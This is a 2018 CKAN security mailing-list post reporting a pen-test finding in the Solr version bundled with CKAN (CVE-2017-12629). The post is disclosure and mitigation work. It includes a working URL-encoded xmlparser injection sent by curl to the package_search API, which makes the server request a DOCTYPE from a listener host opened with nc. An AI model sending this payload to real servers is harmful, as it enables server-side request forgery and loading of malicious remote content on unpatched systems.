[CKAN-Security] solr 6.2
JD Bothma
jd at openup.org.za
Wed Feb 21 07:53:53 UTC 2018
Hi
We've contracted someone to pen-test data.vulekamali.gov.za who found the
following critical vulnerability in CKAN 6.2 as used in the Dockerfile
under contrib
https://www.cvedetails.com/cve/CVE-2017-12629/
https://issues.apache.org/jira/browse/SOLR-11477?attachmentOrder=asc
We're launching our portal right now so not comfortable upgrading solr just
yet, but remapping the xmlparser name to the edismax class has mitigated it
for us for now. See
https://lucene.apache.org/solr/news.html#12-october-2017-please-secure-your-apache-solr-servers-since-a-zero-day-exploit-has-been-reported-on-a-public-mailing-list
I confirmed the vulnerability with the following curl request against a
locally-running ckan instance:
curl -v
localhost/api/3/action/package_search?q=%7B%21xmlparser%20v%3D%27%3C%21DOCTYPE%20a%20SYSTEM%20%22http%3A%2F%2F172.18.0.1%3A8888%2FDEADBEEF%22%3E%3Ca%3E%3C%2Fa%3E%27%7D
On the IP 172.18.0.1 port 8888 I was running nc -l -p 8888 - when running
the request against ckan, I saw a GET request in nc. You can also verify
the vulnerability by looking for "Connection Refused" in the error response
which shows the server tried to request the DOCTYPE you told it to, and
would have executed malicious code you would have served.
Best
JD
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.okfn.org/mailman/private/security/attachments/20180221/2dfab6f8/attachment.html>
More information about the Security
mailing list